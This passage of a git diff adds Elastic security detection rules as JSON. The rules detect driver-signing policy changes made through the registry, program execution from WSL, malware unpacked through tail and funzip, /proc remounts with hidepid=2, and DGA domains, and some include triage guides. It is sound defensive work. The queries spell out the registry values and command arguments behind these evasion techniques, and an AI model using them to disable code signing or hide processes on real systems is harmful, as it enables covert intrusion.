+ ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "da7733b1-fe08-487e-b536-0a04c6d8b0cd", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/", + "subtechnique": [ + { + "id": "T1553.006", + "name": "Code Signing Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1553/006/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "da7733b1-fe08-487e-b536-0a04c6d8b0cd_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_9.json b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_9.json new file mode 100644 index 00000000000..64f9bda2ec1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/da7733b1-fe08-487e-b536-0a04c6d8b0cd_9.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to disable the code signing policy through the registry. Code signing provides authenticity on a program, and grants the user with the ability to check whether the program has been tampered with. By allowing the execution of unsigned or self-signed code, threat actors can craft and execute malicious code.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Code Signing Policy Modification Through Registry", + "note": "## Triage and analysis\n\n### Investigating Code Signing Policy Modification Through Registry\n\nMicrosoft created the Windows Driver Signature Enforcement (DSE) security feature to prevent drivers with invalid signatures from loading and executing into the kernel (ring 0). DSE aims to protect systems by blocking attackers from loading malicious drivers on targets. \n\nThis protection is essential for maintaining system security. However, attackers or administrators can disable DSE and load untrusted drivers, which can put the system at risk. Therefore, it's important to keep this feature enabled and only load drivers from trusted sources to ensure system integrity and security.\n\nThis rule identifies registry modifications that can disable DSE.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Use Osquery and endpoint driver events (`event.category = \"driver\"`) to investigate if suspicious drivers were loaded into the system after the registry was modified.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n\n### Related Rules\n\n- First Time Seen Driver Loaded - df0fd41e-5590-4965-ad5e-cd079ec22fa9\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode.)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type : (\"creation\", \"change\") and\n(\n registry.path : (\n \"HKEY_USERS\\\\*\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Driver Signing\\\\BehaviorOnFailedVerify\",\n \"HKU\\\\*\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Driver Signing\\\\BehaviorOnFailedVerify\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Driver Signing\\\\BehaviorOnFailedVerify\"\n ) and\n registry.value: \"BehaviorOnFailedVerify\" and\n registry.data.strings : (\"0\", \"0x00000000\", \"1\", \"0x00000001\")\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "da7733b1-fe08-487e-b536-0a04c6d8b0cd", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/", + "subtechnique": [ + { + "id": "T1553.006", + "name": "Code Signing Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1553/006/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 9 + }, + "id": "da7733b1-fe08-487e-b536-0a04c6d8b0cd_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/da7f5803-1cd4-42fd-a890-0173ae80ac69_3.json b/packages/security_detection_engine/kibana/security_rule/da7f5803-1cd4-42fd-a890-0173ae80ac69_3.json new file mode 100644 index 00000000000..bdd39dd4db9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/da7f5803-1cd4-42fd-a890-0173ae80ac69_3.json @@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A supervised machine learning model has identified a DNS question name with a high probability of sourcing from a Domain Generation Algorithm (DGA), which could indicate command and control network activity.", + "from": "now-10m", + "index": [ + "logs-endpoint.events.*", + "logs-network_traffic.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Machine Learning Detected a DNS Request With a High DGA Probability Score", + "query": "ml_is_dga.malicious_probability > 0.98\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/dga", + "https://www.elastic.co/security-labs/detect-domain-generation-algorithm-activity-with-new-kibana-integration" + ], + "related_integrations": [ + { + "package": "dga", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "network_traffic", + "version": "^1.1.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "ml_is_dga.malicious_probability", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "da7f5803-1cd4-42fd-a890-0173ae80ac69", + "setup": "## Setup\n\nThe rule requires the Domain Generation Algorithm (DGA) Detection integration assets to be installed, as well as DNS events collected by integrations such as Elastic Defend, Network Packet Capture, or Packetbeat. \n\n### DGA Detection Setup\nThe DGA Detection integration consists of an ML-based framework to detect DGA activity in DNS events.\n\n#### Prerequisite Requirements:\n- Fleet is required for DGA Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- DNS events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint), [Network Packet Capture](https://docs.elastic.co/integrations/network_traffic) integration, or [Packetbeat](https://www.elastic.co/guide/en/beats/packetbeat/current/packetbeat-overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To add the Network Packet Capture integration to an Elastic Agent policy, refer to [this](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html) guide.\n- To set up and run Packetbeat, follow [this](https://www.elastic.co/guide/en/beats/packetbeat/current/setting-up-and-running.html) guide.\n\n#### The following steps should be executed to install assets associated with the DGA Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Domain Generation Algorithm Detection and select the integration to see more details about it.\n- Under Settings, click Install Domain Generation Algorithm Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich DNS events with predictions from the Supervised DGA Detection model. This is done via the ingest pipeline named `-ml_dga_ingest_pipeline` installed with the DGA Detection package.\n- If using an Elastic Beat such as Packetbeat, add the DGA ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `packetbeat.yml`.\n- If adding the DGA ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the DGA ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"ml_is_dga\": {\n \"properties\": {\n \"malicious_prediction\": {\n \"type\": \"long\"\n },\n \"malicious_probability\": {\n \"type\": \"float\"\n }\n }\n }\n }\n}\n```\n", + "severity": "low", + "tags": [ + "Domain: Network", + "Domain: Endpoint", + "Data Source: Elastic Defend", + "Use Case: Domain Generation Algorithm Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1568", + "name": "Dynamic Resolution", + "reference": "https://attack.mitre.org/techniques/T1568/", + "subtechnique": [ + { + "id": "T1568.002", + "name": "Domain Generation Algorithms", + "reference": "https://attack.mitre.org/techniques/T1568/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 3 + }, + "id": "da7f5803-1cd4-42fd-a890-0173ae80ac69_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_6.json b/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_6.json new file mode 100644 index 00000000000..01f8f89e4ef --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_6.json @@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects attempts to execute a program on the host from the Windows Subsystem for Linux. Adversaries may enable and use WSL for Linux to avoid detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution via Windows Subsystem for Linux", + "query": "process where host.os.type == \"windows\" and event.type : \"start\" and\n process.parent.name : (\"wsl.exe\", \"wslhost.exe\") and\n not process.executable : (\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files*\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux_*\\\\wsl*.exe\",\n \"?:\\\\Windows\\\\System32\\\\conhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\lxss\\\\wslhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\Sys*\\\\wslconfig.exe\"\n )\n", + "references": [ + "https://learn.microsoft.com/en-us/windows/wsl/wsl-config" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1202", + "name": "Indirect Command Execution", + "reference": "https://attack.mitre.org/techniques/T1202/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "db7dbad5-08d2-4d25-b9b1-d3a1e4a15efd_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_5.json b/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_5.json new file mode 100644 index 00000000000..ddb4f8680f8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dc0b7782-0df0-47ff-8337-db0d678bdb66_5.json @@ -0,0 +1,119 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when suspicious content is extracted from a file and subsequently decompressed using the funzip utility. Malware may execute the tail utility using the \"-c\" option to read a sequence of bytes from the end of a file. The output from tail can be piped to funzip in order to decompress malicious code before it is executed. This behavior is consistent with malware families such as Bundlore.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Content Extracted or Decompressed via Funzip", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n((process.args == \"tail\" and process.args == \"-c\" and process.args == \"funzip\")) and\nnot process.args : \"/var/log/messages\" and \nnot process.parent.executable : (\"/usr/bin/dracut\", \"/sbin/dracut\", \"/usr/bin/xargs\") and\nnot (process.parent.name in (\"sh\", \"sudo\") and process.parent.command_line : \"*nessus_su*\")\n", + "references": [ + "https://attack.mitre.org/software/S0482/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "dc0b7782-0df0-47ff-8337-db0d678bdb66", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "dc0b7782-0df0-47ff-8337-db0d678bdb66_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_6.json b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_6.json new file mode 100644 index 00000000000..a6476b1f6c8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_6.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of mount process with hidepid parameter, which can make processes invisible to other users from the system. Adversaries using Linux kernel version 3.2+ (or RHEL/CentOS v6.5+ above) can hide the process from other users. When hidepid=2 option is executed to mount the /proc filesystem, only the root user can see all processes and the logged-in user can only see their own process. This provides a defense evasion mechanism for the adversaries to hide their process executions from all other commands such as ps, top, pgrep and more. With the Linux kernel hardening hidepid option all the user has to do is remount the /proc filesystem with the option, which can now be monitored and detected.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Hidden Process via Mount Hidepid", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\") and event.type == \"start\" \nand process.name == \"mount\" and process.args == \"/proc\" and process.args == \"-o\" and process.args : \"*hidepid=2*\"\n", + "references": [ + "https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "dc71c186-9fe4-4437-a4d0-85ebb32b8204", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "dc71c186-9fe4-4437-a4d0-85ebb32b8204_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_7.json b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_7.json new file mode 100644 index 00000000000..41515a59147 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_7.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of mount process with hidepid parameter, which can make processes invisible to other users from the system. Adversaries using Linux kernel version 3.2+ (or RHEL/CentOS v6.5+ above) can hide the process from other users. When hidepid=2 option is executed to mount the /proc filesystem, only the root user can see all processes and the logged-in user can only see their own process. This provides a defense evasion mechanism for the adversaries to hide their process executions from all other commands such as ps, top, pgrep and more. With the Linux kernel hardening hidepid option all the user has to do is remount the /proc filesystem with the option, which can now be monitored and detected.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Hidden Process via Mount Hidepid", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nevent.type == \"start\" and process.name == \"mount\" and process.args == \"/proc\" and process.args == \"-o\" and\nprocess.args : \"*hidepid=2*\"\n", + "references": [ + "https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "dc71c186-9fe4-4437-a4d0-85ebb32b8204", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "dc71c186-9fe4-4437-a4d0-85ebb32b8204_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_8.json b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_8.json new file mode 100644 index 00000000000..8b54abb6da4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/dc71c186-9fe4-4437-a4d0-85ebb32b8204_8.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of mount process with hidepid parameter, which can make processes invisible to other users from the system. Adversaries using Linux kernel version 3.2+ (or RHEL/CentOS v6.5+ above) can hide the process from other users. When hidepid=2 option is executed to mount the /proc filesystem, only the root user can see all processes and the logged-in user can only see their own process. This provides a defense evasion mechanism for the adversaries to hide their process executions from all other commands such as ps, top, pgrep and more. With the Linux kernel hardening hidepid option all the user has to do is remount the /proc filesystem with the option, which can now be monitored and detected.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + 